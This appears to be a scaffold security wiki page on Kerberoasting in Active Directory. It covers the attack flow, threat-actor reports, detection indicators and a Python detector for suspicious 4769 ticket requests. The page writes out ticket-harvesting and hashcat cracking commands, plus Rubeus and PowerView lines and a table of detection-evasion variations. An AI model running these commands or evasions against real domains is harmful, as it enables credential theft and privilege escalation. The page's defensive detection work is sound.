Kerberoasting
Status: Scaffold — content in progress
ATT&CK: T1558.003 — Steal or Forge Kerberos Tickets: Kerberoasting
Platforms: Windows (Active Directory)
Severity: High
What It Exploits
Any authenticated domain user can request a Kerberos service ticket for any account that has a Service Principal Name (SPN). The service ticket is encrypted with a key derived from the service account's password (its NTLM hash in the RC4 case). The attacker takes this ticket offline and cracks it to recover the plaintext password.
Primitive: Kerberos TGS-REP encrypted with service account's RC4 (etype 23) hash → offline brute-force with hashcat.
Attack Flow
1. Enumerate SPNs: any domain user can query LDAP for accounts with SPNs
GetUserSPNs.py ITDR/user:pass@dc01 -dc-ip 192.168.56.10
2. Request service tickets for SPN accounts
GetUserSPNs.py ITDR/user:pass@dc01 -dc-ip 192.168.56.10 -request
3. Crack tickets offline
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
Conditions Required
- Valid domain account (any privilege level — standard user is sufficient)
- Target service account has an SPN set
- Service account has a crackable password
CTI Examples
Scattered Spider / UNC3944 has been reported to use Kerberoasting as a post-access privilege escalation technique in enterprise environments.
Evidence label: Reported | Confidence: Medium | Source reliability: B2 (multiple public vendor reports, corroborated)
APT29 (Cozy Bear) has used credential access techniques including service ticket abuse in targeted intrusions.
Evidence label: Reported | Confidence: Medium | Source reliability: B2
Ransomware operators (multiple groups) routinely use Kerberoasting as a standard escalation step after initial access.
Evidence label: Observed | Confidence: High | Source reliability: A1 (incident response reports)
OPSEC Variations
| Variation | Detection Evasion |
|---|---|
| Request only AES tickets (etype 17/18) | AES requests look less anomalous but are harder to crack |
| Limit request rate | Avoid bulk SPN requests in short time window |
| Target only accounts with weak password indicators | RC4-downgrade request is noisy |
| Use existing user session (no new auth) | Blends with normal user activity |
Behavioral Indicators
- Multiple 4769 events (Kerberos service ticket requests) from a single source in a short timeframe
- 4769 with TicketEncryptionType=0x17 (RC4) — suspicious when targeting accounts that support AES
- LDAP queries for (servicePrincipalName=*) from non-standard sources
- Unusual account requesting tickets for services it has no business accessing
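The two indicators most often turned into detection rules are the burst of 4769 events from one source and the RC4 (0x17) request against an AES-capable service account. The following is an added example, not part of this page or of any of the tools listed below: it runs both checks over a handful of constructed 4769 events. The account inventory (`SPN_ACCOUNTS`, keyed by `msDS-SupportedEncryptionTypes` bit values), the `ITDR.LOCAL` realm, hostnames and addresses are all assumptions made for the example; in practice the events come from the security log and the inventory from an AD export.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# msDS-SupportedEncryptionTypes bit flags (AD schema values; only the ones used here)
RC4_HMAC = 0x4
AES128 = 0x8
AES256 = 0x10
ETYPE_RC4 = 0x17  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed inventory of SPN-bearing accounts -> msDS-SupportedEncryptionTypes.
# Assumption for the example; a real deployment pulls this from AD.
SPN_ACCOUNTS = {
    "svc_sql": RC4_HMAC | AES128 | AES256,   # AES-capable: an RC4 ticket is a downgrade
    "svc_web": RC4_HMAC | AES128 | AES256,
    "svc_backup": RC4_HMAC | AES256,
    "svc_print": RC4_HMAC | AES128 | AES256,
    "svc_legacy": RC4_HMAC,                  # RC4-only: RC4 tickets are expected here
}

# Constructed 4769 events; field names mirror the event's EventData names.
EVENTS = [
    # one workstation pulling tickets for several SPN accounts within about a minute
    {"TimeCreated": "2024-05-01T09:00:05", "IpAddress": "::ffff:192.168.56.50",
     "TargetUserName": "jdoe@ITDR.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-05-01T09:00:20", "IpAddress": "::ffff:192.168.56.50",
     "TargetUserName": "jdoe@ITDR.LOCAL", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-05-01T09:00:41", "IpAddress": "::ffff:192.168.56.50",
     "TargetUserName": "jdoe@ITDR.LOCAL", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-05-01T09:01:10", "IpAddress": "::ffff:192.168.56.50",
     "TargetUserName": "jdoe@ITDR.LOCAL", "ServiceName": "svc_print", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-05-01T09:01:12", "IpAddress": "::ffff:192.168.56.50",
     "TargetUserName": "jdoe@ITDR.LOCAL", "ServiceName": "WS01$", "TicketEncryptionType": "0x12"},
    # ordinary activity from another host: AES ticket, and RC4 only for the RC4-only account
    {"TimeCreated": "2024-05-01T08:15:00", "IpAddress": "::ffff:192.168.56.20",
     "TargetUserName": "asmith@ITDR.LOCAL", "ServiceName": "svc_web", "TicketEncryptionType": "0x12"},
    {"TimeCreated": "2024-05-01T09:20:00", "IpAddress": "::ffff:192.168.56.20",
     "TargetUserName": "asmith@ITDR.LOCAL", "ServiceName": "svc_legacy", "TicketEncryptionType": "0x17"},
]


def parse_event(raw):
    """Normalise one raw 4769 record into typed fields."""
    return {
        "time": datetime.fromisoformat(raw["TimeCreated"]),
        "client": raw["IpAddress"],
        "requester": raw["TargetUserName"].split("@")[0].lower(),
        "service": raw["ServiceName"],
        "etype": int(raw["TicketEncryptionType"], 16),
    }


def is_noise(service):
    """krbtgt and machine accounts generate 4769s constantly and are not Kerberoast targets."""
    return service.lower() == "krbtgt" or service.endswith("$")


def detect_rc4_downgrade(events, spn_accounts):
    """Flag RC4 (0x17) tickets issued for accounts whose inventory says they support AES."""
    alerts = []
    for e in events:
        supported = spn_accounts.get(e["service"])
        if supported is None or is_noise(e["service"]):
            continue
        if e["etype"] == ETYPE_RC4 and supported & (AES128 | AES256):
            alerts.append({"rule": "rc4_downgrade", "requester": e["requester"],
                           "client": e["client"], "service": e["service"]})
    return alerts


def detect_burst(events, threshold=4, window=timedelta(minutes=10)):
    """Flag a (client, requester) pair that requests >= threshold distinct SPN services in one window."""
    by_source = defaultdict(list)
    for e in sorted(events, key=lambda x: x["time"]):
        if not is_noise(e["service"]):
            by_source[(e["client"], e["requester"])].append(e)
    alerts = []
    for (client, requester), evs in by_source.items():
        start = 0
        for end in range(len(evs)):                      # sliding window over sorted events
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            distinct = {x["service"] for x in evs[start:end + 1]}
            if len(distinct) >= threshold:
                alerts.append({"rule": "burst", "client": client, "requester": requester,
                               "services": sorted(distinct)})
                break                                    # one alert per source is enough
    return alerts


def analyze(raw_events=EVENTS, spn_accounts=SPN_ACCOUNTS):
    events = [parse_event(r) for r in raw_events]
    return {"rc4_downgrade": detect_rc4_downgrade(events, spn_accounts),
            "burst": detect_burst(events)}


if __name__ == "__main__":
    for rule, hits in analyze().items():
        for hit in hits:
            print(rule, hit)
```

The machine-account request (`WS01$`) and the RC4 request for the RC4-only `svc_legacy` account are deliberately left unflagged: without that filtering the downgrade rule fires on every legacy service, and the burst rule fires on every workstation logon. Tune `threshold` and `window` against a baseline of your own 4769 volume before alerting on them.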
Tools
| Tool | Command |
|---|---|
| Impacket GetUserSPNs.py | GetUserSPNs.py domain/user:pass@dc -request |
| Rubeus (Windows) | Rubeus.exe kerberoast /stats /outfile:hashes.txt |
| PowerView | Get-DomainUser -SPN |
| BloodHound | Automatically maps Kerberoastable accounts |
Cross-Links
| Topic | Link |
|---|---|
| Kerberos Protocol | kerberos |
| Detection | detect-kerberoasting |
| Lab Simulation | domain-compromise-chain |